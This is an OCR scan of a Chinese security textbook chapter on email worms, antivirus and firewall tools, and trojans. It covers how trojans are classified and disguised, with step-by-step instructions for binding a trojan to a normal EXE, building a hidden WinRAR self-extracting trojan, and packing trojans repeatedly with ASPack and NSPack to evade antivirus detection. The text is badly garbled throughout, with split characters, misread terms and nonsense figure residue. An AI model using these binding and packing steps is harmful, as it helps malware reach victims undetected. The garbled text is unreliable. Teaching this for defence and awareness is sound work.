安 莱 普 (Worm. Anap.b) 蠕 虫 病毒 通过 电子 邮件 传播 ,利用 用 户 对 知名 品牌 的 信任 心 
理 , 伪 装 成 某 些 知名 IT 厂商 (如 微软 .IBM 等 ) 给 用 户 狂 发 带 毒 邮件 ,诱骗 用 户 打 开 附 件 以 致 
中 毒 。 病 毒 发 作 时 会 弹出 一 个 窗口 ,内 容 提示 为 “这 是 一 个 蠕虫 病毒 ”。 同 时 ,该 病毒 会 在 系 
统 临时 文件 和 个 人 文件 夹 中 大 量 收集 邮件 地 址 ,并 循环 发 送 邮件 。 
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针对 这 种 典型 的 邮件 传播 病毒 ,在 查看 自己 的 电子 邮件 时 ,一 定 要 确认 发 件 人 再 打开 。 

虽然 利用 邮件 进行 传播 一 直 是 病毒 传播 的 主要 途径 ,但 随 着 网 络 威胁 种 类 的 增多 和 病 
毒 传播 途径 的 多 样 化 , 某 些 蠕虫 病毒 往往 还 携带 着 “间谍 软件 ”和 “网 络 钓鱼 ”等 不 安全 因素 。 
因此 ,一 定 要 注意 即时 升级 杀毒 软件 到 最 新 版 本 ,并 打开 邮件 监控 程序 ,以 保证 上 网 环境 的 
安全 。 


上 >. 网 络 蝇 虫 病毒 的 全 面 防范 


在 对 网 络 蠕虫 病毒 有 了 一 定 的 了 解 之 后 ,下 面 从 企业 和 个 人 两 种 角度 讲述 应 该 如 何 做 
好 安全 防范 。 

1) 企业 用 户 对 网 络 蠕 虫 的 防范 

企业 在 充分 地 利用 网 络 进行 业务 处 理 时 ,不 得 不 考虑 企业 的 病毒 防范 问题 ,以 保证 关系 
企业 命运 的 业务 数据 的 完整 、 不 被 破坏 。 企 业 防 范 蠕虫 病毒 时 需要 考虑 几 个 问题 : 病毒 的 
查 杀 能 力 、 病 毒 的 监控 能 力 和 新 病毒 的 反应 能 力 。 

推荐 的 企业 防范 蠕虫 病毒 的 策略 如 下 。 

(1) 加 强 安全 管理 ,提高 安全 意识 。 由 于 蠕虫 病毒 是 利用 Windows 系统 漏洞 进行 攻击 
的 ,因此 ,就 要 求 网 络 管理 员 在 第 一 时 间 内 保持 系统 和 应 用 软件 的 安全 性 ,保持 各 种 操作 系 
统 和 应 用 软件 的 及 时 更 新 。 随 着 Windows 系统 各 种 漏洞 的 不 断 涌现 ,要 想 一 劳 永 逸 地 获得 
一 个 安全 的 系统 环境 ,已 几乎 没有 可 能 。 而 作为 系统 负载 重要 数据 的 企业 用 户 , 其 所 面临 攻 
击 的 危险 也 将 越 来 越 大 ,这 就 要 求 企业 的 管理 水 平和 安全 意识 也 必须 越 来 越 高 。 

(2) 建立 病毒 检测 系统 。 能 够 在 第 一 时 间 内 检测 到 网 络 异常 和 病毒 攻击 。 

(3) 建立 应 急 响应 系统 ,尽量 降低 风险 。 由 于 蠕虫 病毒 爆发 的 突然 性 ,病毒 可 能 在 被 发 
现时 已 蔓延 到 了 整个 网 络 , 因 此 建立 一 个 紧急 响应 系统 就 显得 非常 必要 ,这 样 能 够 在 病毒 爆 
发 的 第 一 时 间 提 供 解决 方案 。 

(4) 建立 灾难 备份 系统 。 对 于 数据 库 和 数据 系统 ,必须 采用 定期 备份 .多 机 备份 措施 ， 
防止 意外 灾难 导致 的 数据 丢失 。 

(5) 对 于 局 域 网 而 言 ,可 安装 防火 墙 式 的 计算 机 病毒 防 杀 产品 ,将 病毒 隔离 在 局 域 网 之 
外 ; 或 对 邮件 服务 器 实施 监控 ,切断 带 毒 邮件 的 传播 途径 ; 或 对 局 域 网 管理 员 和 用 户 进行 安 
全 培训 ; 建立 局 域 网 内 部 的 升级 系统 ,包括 各 种 操作 系统 的 补丁 升级 、 各 种 常用 的 应 用 软件 
升级 、 各 种 杀毒 软件 病毒 库 的 升级 等 。 

2) 个 人 用 户 对 网 络 蠕 虫 的 防范 

对 于 个 人 用 户 而 言 ,威胁 大 的 蠕虫 病毒 采取 的 传播 方式 一 般 为 电子 邮件 (E-mail) 以 及 
恶意 网 页 等 。 下 面 介绍 个 人 应 该 如 何 防 范 网 络 蠕虫 病毒 。 

(1) 安装 合适 的 杀毒 软件 。 网 络 蠕虫 病毒 的 发 展 已 经 使 传统 的 杀毒 软件 的 “文件 级 实 
时 监控 系统 落伍 ,杀毒 软件 必须 向 内 存 实时 监控 和 邮件 实时 监控 发 展 ; 网 页 病毒 也 使 用 户 
对 杀毒 软件 的 要 求 越 来 越 高 。 

(2) 经 常 升级 病毒 库 。 杀 毒 软件 对 病毒 的 查 杀 是 以 病毒 的 特征 码 为 依据 的 ,而 病毒 每 
天 都 层出不穷 ,尤其 是 在 网 络 时 代 ,蠕虫 病毒 的 传播 速度 快 ,变种 多 ,所 以 必须 随时 更 新 病毒 


一 一 一 人 














第 4 章 smns IE 
库 ,以 便 能 够 查 杀 最 新 的 病毒 。 


(3) 提高 防 杀 毒 意识 。 不 要 随意 访问 陌生 的 站 点 ,因为 其 中 有 可 能 就 含有 恶意 代码 。 
当 运 行 下 时 ,在 “Internet 区 域 的 安全 级 别 ? 选 项 中 把 安全 级 别 由 “中 ? 改 为 高”, 因 为 这 一 类 
网 页 主要 是 含有 恶意 代码 的 ActiveX 或 Applet JavaScript 的 网 页 文件 ,在 IE 设置 中 将 
ActiveX 控件 和 插件 .Java 小 程序 脚本 等 全 部 禁止 ,以 大 大 减少 被 网 页 恶意 代码 感染 的 概 
率 ,如 图 4-6 所 示 。 不 过 ,这 样 做 可 能 会 导致 以 后 在 浏览 网 页 过 程 中 ,一 些 正 常 应 用 ActiveX 
的 网 站 也 无 法 浏览 。 
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图 4-6 IE 安全 设置 


(4) 不 随意 查看 陌生 邮件 。 一 定 不 要 打开 扩展 名 为 . vbs、 shs 或 . pif 的 邮件 附件 。 这 
些 扩展 名 从 未 在 正常 附件 中 使 用 过 ,反而 经 常 被 病毒 和 蠕虫 使 用 。 


P 4.4.5 杀毒 工具 


杀毒 软件 也 是 病毒 防范 必 不 可 少 的 工具 , 随 着 人 们 对 病毒 危害 的 认识 ,杀毒 软件 也 逐渐 
被 重视 起 来 ,各 式 各 样 的 杀毒 软件 如 雨后春笋 般 出 现在 市 场 中 。 


Li. 用 NOD32 查 杀 病毒 


NOD32 是 由 ESET 发 明 设计 的 杀毒 防毒 软件 。ESET 于 1992 年 建立 ,是 一 个 全 球 性 
的 安全 防范 软件 公司 ,主要 为 企业 和 个 人 消费 者 提供 服务 。NOD32 以 轻巧 易 用 、 惊 人 的 检 
测速 度 及 卓越 的 性 能 深 受 用 户 青睐 ,成 为 许多 用 户 和 IT 专家 的 首选 。 经 多 家 检测 权威 确 
认 ,NOD32 在 速度 .精确 度 和 各 项 表现 上 已 拥有 多 项 全 球 纪录 。 

在 使 用 NOD32 进行 查 杀 病毒 之 前 ,最 好 先 升级 一 下 病毒 库 , 这 样 才能 保证 杀毒 软件 对 
新 型 病毒 的 查 杀 效果 。 更 新 病毒 库 之 后 .就 可 以 对 计算 机 进行 最 常用 的 查 杀 病毒 操作 了 。 
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具体 操作 步骤 如 下 。 
(1) 打开 NOD32 主 界面 , 单 击 * 计 算 机 扫描 ?选项 ,如 图 4-7 所 示 。 






La | 
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肪 后 辣 8B 志 
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图 4-7 用 NOD32 进行 扫描 


(2) 默认 进行 智能 扫描 ,也 可 以 单 击 “ 自 定义 扫描 ”按钮 ,任意 选取 扫描 的 目标 范围 。 

(3) 查看 扫描 结果 时 ,可 以 选择 “在 新 窗口 中 打开 扫描 ”选项 ,在 “计算 机 扫描 ”窗口 中 可 
查看 详细 的 扫描 过 程 以 及 病毒 的 详细 信息 。 

(4) 在 主 界面 中 单 击 “ 设 置 ”选项 ,可 根据 提示 启用 防护 。 

(5) 单 击 “ 工 具 ” 选 项 .可 以 查看 日 志文 件 、 设 置 计 划 任 务 、 查 看 防护 统计 以 及 被 隔离 的 
文件 等 信息 。 


2 免费 的 个 人 防火 墙 ZoneAlarm 


ZoneAlarm 强大 的 双向 防火 墙 能 够 监控 个 人 计算 机 和 互联 网 传人 和 传 出 的 流量 ,能 够 
阻止 黑客 进入 一 台 个 人 计算 机 发 动 攻 击 并 穷 取信 息 。 同 时 ,ZoneAlarm 的 强大 的 反 病 毒 引 
擎 可 检测 和 阻止 病毒 .间谍 软件 .特洛伊 木马 .蠕虫 .僵尸 和 rootkit。 

下 面 介绍 ZoneAlarm 的 使 用 ,具体 操作 步 又 如 下 。 

(1) 从 官网 下 载 30 天 试用 版 ,安装 文件 大 约 280MB。 安 装 完成 后 ,在 主 界面 上 选择 
ANTIVIRUS & FIREWALL 项 ,如 图 4-8 所 示 。 打 开 杀 毒 和 防火 墙 功能 。 
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图 4-8 ZoneAlarm 运行 界面 


(2) 在 图 4-8 中 , 单 击 防火 墙 中 的 Settings 链接 ,打开 防火 墙 的 设置 界面 。 可 以 对 防火 
墙 的 Trusted Zone、Public Zone、Advanced 等 进行 设置 ,如 图 4-9 所 示 。 











Trusted Zone General Settings 一 一 

Public Zone 四 Block all fragmen 加 | Allow VPN protocols 

Advanced | [CI Block trusted ser' 上 | Allow uncommon protocol: | 
Bxpert Rules 四 | Block public serv, 加 Lock hosts file | 
View Zones 四 | Enable ARP protec- 











加 | Filter IP traffic 
Network settings 一 一 





Include networks in the Trusted Zone ) 
Exclude networks from the Trusted Zon: 
Ask which Zone to place new networks 


lutomatically put new unprotected 
ireless networks (WEP or WPA) in the 


[Dgnable IPYE networking 























图 4-9 ZoneAlarm 中 防火 墙 的 设置 
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(3) 在 主 界面 的 WEB & PRIVACY 项 中 ,可 以 对 防 键盘 记录 、 防 垃圾 邮件 等 进行 设置 。 


| 4.5 “木马 攻防 实例 | 


本 节 主 要 介绍 木马 的 伪装 手段 .捆绑 木马 和 反弹 端口 木马 ,木马 程序 的 免 杀 以 及 木马 清 
除 工 具 的 使 用 等 ,从 而 有 效 帮 助 用 户 避 免 计 算 机 中 木马 病毒 ,保障 系统 的 安全 性 。 

木马 (Trojan) 与 计算 机 网 络 中 常常 要 用 到 的 远程 控制 软件 有 些 相似 ,通过 一 段 特定 的 
程序 (木马 程序 ) 来 控制 男 一 台 计 算 机 ,从 而 窃取 用 户 资料 ,破坏 用 户 的 计算 机 系统 等 。 

木马 程序 技术 发 展 可 谓 非常 迅速 ,主要 是 有 些 年 轻 人 出 于 好 奇 , 或 是 急于 显示 自己 实 
力 ,不 断 改进 木马 程序 的 编写 。 至 今 , 木 马 程序 已 经 经 历 了 六 代 的 改进 。 

第 一 代 : 最 原始 的 木马 程序 ,主要 是 简单 的 密码 窃取 ,通过 电子 邮件 发 送信 息 等 ,具备 
了 木马 最 基本 的 功能 。 

第 二 代 : 在 技术 上 有 了 很 大 的 进步 ,冰河 是 中 国 木 马 的 典型 代表 之 一 。 

第 三 代 : 主要 改进 在 数据 传递 技术 方面 ,出 现 了 ICMP 等 类 型 的 木马 ,利用 畸形 报 文 传 
递 数据 ,增加 了 杀毒 软件 查 杀 识别 的 难度 。 

第 四 代 : 在 进程 隐藏 方面 有 了 很 大 改动 ,采用 了 内 核 插入 式 的 嵌入 方式 ,利用 远程 插入 
线程 技术 嵌入 DLL 线程 。 或 者 挂 接 PSAPI, 实 现 木 马 程序 的 隐藏 ,甚至 在 Windows NT/ 
2000 下 ,都 达到 了 良好 的 隐藏 效果 。 灰 钥 子 和 蜜蜂 大 盗 都 是 比较 出 名 的 DLL 木马 。 

第 五 代 : 驱动 级 木马 。 驱 动 级 木马 多 数 都 使 用 了 大 量 的 Rootkit 技术 来 达到 深度 隐藏 
的 效果 ,并 深入 到 内 核 空间 ,感染 后 针对 杀毒 软件 和 网 络 防火 墙 进 行 攻击 ,可 将 系统 SSDT 
初始 化 ,导致 杀毒 防火 墙 失 去 效应 。 有 的 驱动 级 木马 可 驻 留 BIOS ,并 且 很 难 查 杀 。 

第 六 代 : 随 着 身份 认证 USB Key 和 杀毒 软件 主动 防御 的 兴起 , 黏 虫 技术 类 型 和 特殊 反 
显 技术 类 型 木马 逐渐 开始 系统 化 。 前 者 主要 以 资 取 和 自 改 用 户 敏感 信息 为 主 ; 后 者 以 动态 
口令 和 硬 证 书 攻击 为 主 。PassCopy 和 上 暗黑 蜂 蛛 侠 是 这 类 木马 的 代表 。 


j* 4.5.1 木马 的 组 成 和 分 类 


由 1. 木马 的 组 成 


一 个 完整 的 木马 由 三 部 分 组 成 : 硬件 部 分 、 软 件 部 分 和 具体 连接 部 分 。 这 三 部 分 分 别 
有 着 不 同 的 功能 。 

1) 硬件 部 分 

硬件 部 分 是 指 建立 木马 连接 必需 的 硬件 实体 ,包括 控制 端 、 服 务 端 和 Internet 三 部 分 。 

(1) 控制 端 : 对 服务 端 进行 远程 控制 的 一 端 。 

(2) 服务 端 : 被 控制 端 远程 控制 的 一 端 。 

(3) Internet: 是 数据 传输 的 网 络 载体 ,控制 端 通过 Internet 远程 控制 服务 端 。 

2) 软件 部 分 

软件 部 分 是 指 实现 远程 控制 所 必需 的 软件 程序 ,主要 包括 控制 端 程序 .服务 端 程序 和 木 
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马 配置 程序 三 部 分 。 

(1) 控制 端 程序 : 控制 端 用 于 远程 控制 服务 端的 程序 。 

(2) 服务 端 程序 : 又 称 为 木马 程序 。 它 潜伏 在 服务 端 内 部 ,向 指定 地 点 发 送 数 据 ,如 网 
络 游戏 的 密码 、 即 时 通信 软件 密码 和 用 户 上 网 密码 等 。 

(3) 木马 配置 程序 : 用 户 设 置 木马 程序 的 端口 号 、 触 发 条 件 、 木 马 名 称 等 属性 ,使 得 服务 
端 程序 在 目标 极端 中 潜伏 得 更 加 隐蔽 。 

3) 具体 连接 部 分 

具体 连接 部 分 是 指 通过 Internet 在 服务 端 和 控制 端 之 间 建 立 一 条 木马 通道 所 必需 的 元 
素 ,包括 控制 端 / 服 务 端 IP 和 控制 端 /服务 端 端口 两 部 分 。 

(1) 控制 端 /服务 端 IP: 木马 控制 端 和 服务 端的 网 络 地 址 ,是 木马 传输 数据 的 目的 地 。 

(2) 控制 端 /服务 端 端口 : 木马 控制 端 和 服务 端的 数据 入 口 ,通过 这 个 入 口 ,数据 可 以 直 
达 控 制 端 程序 或 服务 端 程序 。 


有 2 木马 的 分 类 


随 着 计算 机 技术 的 发 展 ,木马 程序 技术 也 发 展 迅 速 。 现 在 的 木马 已 经 不 仅仅 具有 单一 
的 功能 ,而 是 集 多 种 功能 于 一 身 。 根 据 木马 功能 的 不 同 , 可 以 将 其 划分 为 破坏 型 木马 .远程 
访问 型 木马 、 密 码 发 送 型 木马 键盘 记录 型 木马 .DoS 型 攻击 木马 等 。 

1) 破坏 型 木马 

破坏 型 木马 唯一 的 功能 就 是 破坏 并 且 删 除 计算 机 中 的 文件 ,因此 一 旦 感染 ,就 会 严重 威 
胁 到 计算 机 的 安全 ,非常 危险 。 不 过 ,. 像 这 种 恶意 破坏 的 木马 ,黑客 也 不 会 随意 传播 。 

2) 远程 访问 型 木马 

远程 访问 型 木马 是 一 种 使 用 很 广泛 并 且 危 害 很 大 的 木马 程序 。 它 可 以 远程 访问 并 且 直 
接 控制 被 人 侵 的 计算 机 ,从 而 任意 访问 该 计算 机 中 的 文件 ,获取 计算 机 用 户 的 私人 信息 , 例 
如 银行 账号 和 密码 等 。 

3) 密码 发 送 型 木马 

密码 发 送 型 木马 是 一 种 专门 用 于 资 取 目标 计算 机 中 密码 的 木马 文件 。 有 些 用 户 为 了 方 
便 使 用 Windows 的 密码 记忆 功能 进行 登录 ,有 些 用 户 喜欢 将 一 些 密码 信息 以 文本 文件 的 形 
式 存放 于 计算 机 中 ,虽然 这 样 确实 为 用 户 带 来 了 一 定 方便 ,但 是 正好 为 密码 发 送 型 木马 带 来 
了 可 乘 之 机 , 它 会 在 用 户 未 曾 发 觉 的 情况 下 ,搜集 密码 发 送 到 指定 的 邮箱 ,从 而 达到 盗 取 密 
码 的 目的 。 

4) 键盘 记录 型 木马 

键盘 记录 型 木马 非常 简单 , 它 通常 只 做 一 件 事 , 就 是 记录 目标 计算 机 键盘 敲 击 的 按键 信 
息 ,并 且 在 LOG 文件 中 查找 密码 。 该 木马 可 以 随 着 Windows 的 启动 而 启动 ,并 且 有 在 线 记 
录 和 离线 记录 两 个 选项 ,从 而 记录 用 户 在 在 线 和 离线 状态 下 项 击 键盘 的 按键 情况 ,从 中 提取 
密码 等 有 效 信息 。 当 然 , 这 种 木马 也 有 邮件 发 送 功能 ,需要 将 信息 发 送 到 指定 的 邮箱 中 。 

5) DoS 攻击 型 木马 

随 着 DoS 攻击 的 广泛 使 用 .DoS 攻击 木马 使 用 得 也 越 来 越 多 。 黑 客人 侵 一 台 计 算 机 后 ， 
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在 该 计算 机 上 种 上 DoS 攻击 木马 ,以 后 这 台 计 算 机 也 会 成 为 黑客 攻击 的 帮手 。 黑 客 通过 扩 
充 控制 肉鸡 的 数量 来 提高 DoS 攻击 并 取得 的 成 功率 。 这 种 木马 不 是 致力 于 感染 一 台 计 算 
机 ,而 是 通过 它 攻 击 一 台 又 一 台 计 算 机 ,从 而 造成 很 大 的 网 络 伤害 并 且 带 来 损失 。 


> 4.5.2 木马 的 伪装 和 生成 


黑客 们 往往 会 使 用 多 种 方法 来 伪装 木马 ,以 降低 用 户 的 警惕 性 ,从 而 欺骗 用 户 。 为 让 用 
户 执行 木马 程序 ,黑客 须 通过 各 种 方式 对 木马 进行 伪装 ,如 伪装 成 网 页 .图片 .电子 书 等 。 读 
者 须 了 解 黑 客 伪装 木马 的 各 种 方式 ,才能 避免 上 当 受骗 。 


有 1. 木马 的 伪装 手段 曝光 


越 来 越 多 的 人 对 木马 了 解 和 防范 的 意识 加 强 ,对 木马 传播 起 到 了 一 定 的 抑制 作用 ,为 
此 ,木马 设计 者 们 就 开发 了 多 种 功能 来 伪装 木马 ,以 达到 欺骗 用 户 的 目的 。 下 面 就 来 详细 了 
解 木马 的 常用 伪装 方法 。 

1) 修改 图 标 

现在 已 经 有 木马 可 以 将 木马 服务 端 程序 的 图 标 改 成 HTML TXT、ZIP 等 各 种 文件 的 
图 标 , 这 就 使 其 具备 了 相当 大 的 迷惑 性 。 不 过 ,目前 提供 这 种 功能 的 木马 还 很 少见 ,并 且 这 
种 伪装 也 极 易 识 破 , 所 以 不 必 过 于 担心 此 类 木马 。 

2) 冒充 图 片 文件 

这 是 许多 黑客 常用 来 骗 别人 执行 木马 的 方法 ,就 是 将 木马 说 成 图 像 文件 ,比如 照片 , 虽 
说 这 样 是 不 合 逻辑 的 ,但 却 使 很 多 人 中 招 。 只 要 入 侵 者 将 木马 程序 扮 成 照片 并 更 改 服务 端 
程序 的 文件 名 为 “类 似 ” 图 像 文件 的 名 称 , 再 假装 传送 照片 给 受害 者 ,不 少 受害 者 就 会 立刻 执 
行 它 。 

3) 文件 捆绑 

恶意 捆绑 文件 伪装 手段 是 将 木马 捆绑 到 一 个 安装 程序 上 , 当 用 户 在 安装 该 程序 时 ,木马 
就 偷偷 地 潜入 了 系统 。 被 捆绑 的 文件 一 般 是 可 执行 文件 ( 即 EXE 和 COM 一 类 的 文件 )。 这 
样 做 对 一 般 人 的 迷惑 性 很 大 ,而 且 即 使 以 后 重 装 系统 了 ,如 果 系 统 中 还 保存 了 那个 “游戏 ”， 
就 有 可 能 再 次 中 招 。 

4) 出 错 信息 显示 

众所周知 , 当 在 打开 一 个 文件 时 ,如 果 程 序 没有 任何 反应 , 它 很 可 能 就 是 一 个 木马 程序 。 
为 规避 这 一 缺陷 ,已 有 设计 者 为 木马 提供 了 一 个 出 错 显示 功能 。 该 功能 允许 在 服务 端 用 户 
打开 木马 程序 时 ,弹出 一 个 假 的 出 错 信息 提示 框 (内 容 可 自由 定义 ) ,诸如 “文件 已 破坏 ,无 法 
打开 !1” 信 息 , 当 服务 端 用 户 信以为真 时 ,木马 已 经 悄悄 侵入 了 系统 。 

5) 把 木马 伪装 成 文件 夹 

把 木马 文件 伪装 成 文件 夹 图 标 后 ,将 其 放 在 一 个 文件 夹 中 ,然后 在 外 面 再 套 三 四 个 空 
文件 夹 ,由 于 很 多 人 有 连续 点 击 的 习惯 ,点 到 那个 伪装 成 文件 夹 木马 时 ,也 会 收 不 住 鼠 标 
继续 点 下 去 ,这样 木马 就 成 功 运行 了 。 识 别 方 法 : 不 要 隐藏 系统 中 已 知 文件 类 型 的 扩展 
名 称 。 
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6) 给 木马 服务 端 程序 更 名 


木马 服务 端 程序 的 命名 有 很 大 的 学 问 。 如 果 使 用 原来 的 名 字 而 不 做 任何 修改 , 谁 不 知 
道 这 是 个 木马 程序 呢 ? 所 以 ,木马 的 命名 也 是 千奇百怪 。 不 过 ,大 多 是 改 为 和 系统 文件 名 类 
似 的 名 字 , 如 果 用 户 对 系统 文件 不 够 了 解 ,可 就 危险 了 。 例 如 ,有 的 木马 把 名 字 改 为 
window. exe, 还 有 的 更 改 扩展 名 ,比如 把 dll 改 为 dl1( 注 意 是 数字 “11” 而 非 英 文字 母 
“7 等 。 

7) 藏身 于 系统 文件 夹 中 

由 于 用 户 在 服务 端 打 开 含 有 木马 的 文件 后 ,木马 会 将 自己 复制 到 Windows 的 系统 文件 
夹 (一 般 位 于 C:\Windows\system) 中 。 一 般 来 说 ,原木 马 文件 和 系统 文件 夹 中 的 木马 文件 
大 小 一 样 (捆绑 文件 的 木马 除外 ) ,只 要 在 近来 收 到 的 信件 和 下 载 的 软件 中 找到 原木 马 文件 ， 
再 去 系统 文件 夹 中 查找 相同 大 小 的 文件 ,判断 哪个 是 木马 ,将 其 删除 即 可 。 


12. 木马 捆绑 技术 


黑客 可 以 使 用 木马 拥 绑 技术 将 一 个 正常 的 可 执行 文件 和 木马 拥 绑 在 一 起 。 一 旦 用 户 运 
行 这 个 含有 木马 的 可 执行 文件 ,就 可 以 实现 通过 木马 控制 或 攻击 用 户 的 计算 机 的 目的 。 下 
面 主要 以 EXE 捆绑 机 来 讲解 如 何 将 木马 捆绑 到 可 执行 文件 上 。 

EXE 捆绑 机 可 以 将 两 个 可 执行 文件 (EXE 文件 ) 捆 绑 成 一 个 文件 ,运行 捆绑 后 的 文件 等 
于 同时 运行 两 个 文件 。 它 会 自动 更 改 图 标 , 使 捆绑 后 的 文件 与 捆绑 前 的 文件 图 标 一 样 。 具 
体操 作 步 又 如 下 。 

(1) 下 载 并 解压 “EXE 文件 捆绑 机 ”, 双 击 ExeBinder. exe 文件 ,运行 软件 。 

(2) 按 界 面向 导 , 指 定 第 一 个 可 执行 文件 。 可 采用 WinRAR 创建 自 解压 文件 测试 ,或 用 
软件 中 的 小 游戏 “ 蜂 蛛 纸牌 .exe 扫雷 . exe 等 ”测试 。 

(3) 按 向 导 指定 第 二 个 可 执行 文件 。 该 文件 会 捆绑 在 第 一 个 可 执行 文件 上 运行 。 

(4) 指定 捆绑 后 文件 保存 的 位 置 和 文件 名 。 

(5) 在 生成 时 ,有 两 种 生成 版 本 类 型 。 在 虚拟 机 上 测试 时 ,只 须 选 用 “普通 版 ”类 型 就 可 
以 了 。 

(6) 文件 捆绑 成 功 后 .生成 的 捆绑 文件 的 图 标 与 原 第 一 个 可 执行 文件 一 样 , 当 运 行 捆绑 
文件 时 ,会 同时 运行 两 个 可 执行 文件 。 测 试 运行 时 ,可 以 从 文件 类 型 看 到 生成 的 文件 与 第 一 
个 可 执行 文件 的 不 同 。 

使 用 *EXE 文件 捆绑 机 ”软件 ,在 执行 过 程 中 最 好 将 第 一 个 可 执行 文件 作为 正常 的 可 执 
行文 件 ,第 二 个 可 执行 文件 作为 木马 文件 ,这 样 捆绑 后 的 文件 图 标 会 与 正常 的 可 执行 文件 图 
标 相同 。 


上 3. 自 解压 捆绑 木马 的 生成 


随 着 网 络 安全 水 平 的 提高 ,木马 很 容易 就 被 查 杀 出 来 ,因此 木马 种 植 者 会 想 出 各 种 办 法 伪 
装 和 隐藏 自己 的 行为 ,利用 WinRAR 自 解压 功能 捆绑 木马 就 是 手段 之 一 。 具 体操 作 步 又 如 下 。 
(1) 将 要 捆绑 的 两 个 文件 放 在 同一 个 文件 夹 内 ,如 一 个 是 正常 文件 , 另 一 个 为 木马 文 
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件 。 选 中 两 个 文件 , 右 击 后 出 现 快捷 菜单 ,选择 “添加 到 压缩 文件 ”命令 。 
(2) 在 “常规 ”选项 卡 中 ,设置 压缩 参数 为 “创建 自 解压 格式 压缩 文件 ”。 
(3) 在 “高 级 ”选项 卡 中 , 单 击 “ 自 解压 选项 ”按钮 。 
(4) 在 打开 的 “高 级 自 解压 选项 对 话 框 中 ,选择 “模式 ”选项 卡 ,选择 * 全 部 隐藏 选项 。 
(5) 选择 “文本 和 图 标 ? 选 项 卡 ,填写 * 自 解压 文件 窗口 标题 ”和 * 自 解压 文件 窗口 中 显示 
的 文本 ”等 信息 ,如 图 4-10 所 示 。 













































































BRENFEN oe “em 
a ET |} 
3 
自 解 压 文件 窗口 标题 or 
与 单个 文件 自 角 压 标题 相同 
口中 显示 的 文本 0 
和 习 || 
| 
4 » = 
从 文 作文 本 由 ] | 
自 定义 自 解压 文件 向 标 和 图 标 
从 文件 加 载 自 解压 徽标 6) 浏览 0.… 
从 文件 加 载 自 解压 文件 图 标 吕 ) EEC 
蕊 栈 ] 志 随 ] 亡 聘 























图 4-10 用 WinRAR 创建 自 解压 捆绑 木马 设置 


(6) 单 击 “确定 ”按钮 , 回 到 WinRAR 的 主 界面 ,选择 “注释 "选项 卡 。 查 看 或 手工 输入 注 
释 内 容 。 
(7) 单 击 “ 确 定 ” 按 钮 ,生成 自 解压 文件 。 


PP 4.5.3 木马 的 加 学 与 脱党 


加 壳 就 是 将 一 个 可 执行 程序 中 的 各 种 资源 ,包括 对 EXE、DLL 等 文件 进行 压缩 。 压 缩 
后 的 可 执行 文件 依然 可 以 正确 运行 ,运行 前 先 在 内 存 中 将 各 种 资源 解压 缩 ,再 调 入 资源 执行 
程序 。 加 壳 后 的 文件 变 小 了 ,而 且 文件 的 运行 代码 已 经 发 生变 化 ,从 而 避免 被 木马 查 杀 软件 
扫描 出 来 并 查 杀 。 加 壳 后 的 木马 也 可 通过 专业 软件 查看 是 否 加 过 成功。 脱 壳 正好 与 加 壳 相 
反 , 指 脱 掉 加 在 木马 外 面 的 “ 壳 ”, 脱 壳 后 的 木马 很 容易 被 杀毒 软件 扫描 并 查 杀 。 


Li 使 用 ASPack 加 过 


ASPack 是 一 款 非 常 好 的 32 位 PE 格式 的 可 执行 文件 压缩 软件 ,通常 是 将 文件 夹 进行 
压缩 ,用 来 缩小 其 存储 空间 。 但 压缩 后 的 文件 不 能 再 运行 了 ,如 果 想 运行 ,必须 解压 缩 。 
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ASPack 是 专门 用 于 对 Win32 可 执行 程序 进行 压缩 的 工具 ,压缩 后 程序 能 正常 运行 ,丝毫 不 
会 受到 任何 影响 。 而 且 即 使 已 经 将 ASPack 从 系统 中 删除 ,压缩 过 的 文件 仍 可 正常 使 用 。 
使 用 ASPack 对 木马 加 过 ,具体 操作 步骤 如 下 。 
(1) 运行 ASPack, 打 开 “ 选 项 ”选项 卡 ,如 图 4-11 所 示 进 行 设置 。 


能 ASpack 2.28 = 一 (de. 











Win32 EXE.DLL 压缩 器 
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图 4-11 ASPack 加 这 选项 设置 


(2) 在 “打开 文件 ”选项 卡 中 , 单 击 “ 打 开 ” 按 钮 。 
(3) 选择 要 加 过 的 木马 程序 , 单 击 “ 打 开 ” 按 钮 。 
(4) 在 “压缩 "选项 卡 中 , 单 击 “ 开 始 "按钮 进行 压缩 ,完成 加 壳 过程。 


有 2 使 用 “北斗 程序 压缩 "进行 多 次 加 过 


虽然 为 木马 加 壳 可 以 使 其 躲 过 某 些 杀毒 软件 ,但 还 会 有 一 些 特别 强 的 杀毒 软件 仍然 可 
以 查 杀 出 只 加 过 一 次 壳 的 木马 ,所 以 只 有 进行 多 次 加 壳 才 能 保证 不 被 杀毒 软件 查 杀 。“ 北 斗 
程序 压缩 "(NSPack) 是 一 款 拥有 自主 知识 产权 的 压缩 软件 ,是 一 个 EXE .DLL .OCX 、SCR 
等 32 位 .64 位 可 运行 文件 的 压缩 器 。 压 缩 后 的 程序 可 减少 程序 在 网 络 上 的 上 传 和 下 载 
时 间 。 

使 用 “北斗 程序 压缩 "给 木马 服务 端 进行 多 次 加 过 ,具体 操作 步骤 如 下 。 

(1) 运行 “北斗 程序 压缩 ”软件 ,选择 “配置 选项 ”选项 卡 ,选择 “处 理 共享 节 ” 复 选 框 等 重 
要 参数 ,如 图 4-12 所 示 。 

(2) 在 “文件 压缩 ”选项 卡 中 , 单 击 “ 打 开 ” 按 钮 ,选择 可 执行 文件 。 

(3) 单 击 “压缩 ”按钮 ,对 木马 程序 进行 压缩 。 

当 有 大 量 的 木马 程序 需要 进行 压缩 加 壳 时 ,可 以 使 用 * 北 斗 程序 压缩 ”的 “目录 ”压缩 功 
能 ,进行 批量 压缩 加 壳 。 

经 过 “北斗 程序 压缩 ?加 壳 的 木马 程序 ,可 以 使 用 ASPack 等 加 壳 工 具 进行 再 次 加 壳 ,这 
样 就 有 了 两 层 壳 的 保护 。 








有 3. 使 用 pe-scan 检测 木马 是 否 加 过 
pe-scan 是 一 个 类 似 于 FileInfo 和 PE iDentifier 的 工具 ,可 以 检测 出 加 壳 时 使 用 了 哪 种 
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选项 @) 


克 压缩 资源 

友 在 压缩 前 备份 程序 

订 强制 压缩 
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厂 加 载 后 自动 运行 

厅 使 用 Windows DLL 加 载 器 
厂 保留 原文 件 的 大 小 

节 和 名称 


如 文件 压缩 | 项 目录 压缩 昼 配 于 选 页 | 起 关于 | 


你 知 略 重 定位 节 
厂 保留 额 外 数据 
伙 退出 保存 设置 
厂 使 用 She 右键 扩 展 
厂 更 新 aos stub 部 分 


厅 最 大 程度 压缩 (rin9x: 不 支持 ) 
厂 兼容 性 压缩 





〇 使 用 随机 数 命 名 (0000000-9999999) 


